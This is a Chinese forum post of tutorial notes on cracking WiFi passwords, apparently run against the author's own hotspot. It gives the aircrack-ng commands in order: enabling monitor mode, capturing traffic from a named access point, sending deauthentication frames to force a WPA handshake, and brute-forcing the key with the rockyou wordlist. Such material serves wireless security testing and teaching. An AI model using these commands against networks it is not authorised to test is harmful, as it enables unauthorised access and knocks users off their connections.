电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 1142 人浏览分享

WiFi无线攻防-破解密码小实例笔记

[复制链接]
1142 0
本帖最后由 zhaorong 于 2021-8-3 14:56 编辑

无线网络 是指无需布线就能实现各种通信设备互联的网络。无线网络技术涵盖的范围很广,既包括允许用户建立远距离无线
连接的全球语音和数据网络,也包括为近距离无线连接进行优化的红外线及射频技术。根据网络覆盖范围的不同 可以将无线
网络划分为无线广域网 WWAN:Wireless Wide Area Network 无线局域网(WLAN:Wireless Local Area Network 无线
城域网(WMAN:Wireless Metropolitan Area Network)和无线个人局域网(WPAN:Wireless Personal Area Network。

准备阶段-插入网卡后 选择添加到虚拟机,iwconfig可以看到多出一个wlan 0网卡;

QQ截图20210803144310.png

QQ截图20210803144338.png

QQ截图20210803144406.png

激活网卡
  1. airmon-ng start wlan0  
复制代码

100.png

这个时候iwconfig可以看见已经激活

99.png

探测阶段-利用网卡搜索周围能获取到WiFi的信息 这里以及下面的所有抓包阶
段都是按两次q退出 不要强制退出。
  1. airodump-ng wlan0mon
复制代码

98.png

抓包阶段-利用airodump
这里选择了我的热点 这里需要注意的是我们设置保存的文件名是zcc 但是生成的文件却
不是zcc.ivs而是zcc-01.ivs。
  1. airodump-ng --ivs --bssid D6:D0:40:0B:72:7E -w zcc -c 8 wlan0mon
复制代码

96.png

QQ截图20210803144807.png

其中2C:DB:07:84:9A:6D是我的本机,他链接到了D6:D0:40:0B:72:7E这个网络内。

这里也可以抓取CAP包 可以看见他生成了好几个文件,其中有CAP包:
  1. airodump-ng -c 8 -w /root/Desktop/ --bssid D6:D0:40:0B:72:7E wlan0mon
复制代码

92.png

攻击阶段-aireplay(谨记:开新窗口运行)

此处需要新开一个shell
  1. aireplay-ng -0 1 -a D6:D0:40:0B:72:7E -c 2C:DB:07:84:9A:6D wlan0mon
复制代码

91.png

当出现WPA handshake:D6:D0:40:0B:72:7E时 说明抓包完成 获取到了wifi包的加密秘钥前提条件是有机子连接这个wifi;

90.png

收集阶段-字典攻击CAP(字典收集)

(1)使用kali自带密钥字典:
  1. • cd /usr/share/wordlists/
  2. • gzip -d rockyou.txt.gz
复制代码

89.png

(2)导入本地的密码本

88.png

破解阶段-aircrack破解

(1)ivs数据包爆破
  1. aircrack-ng -w password.txt zcc-01.ivs
复制代码

87.png

KEY FOUND!后面中括号中就是WiFi密码。

(2)破解cap包情况
  1. aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/Desktop/-01.cap
复制代码

86.png

成功破解!

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.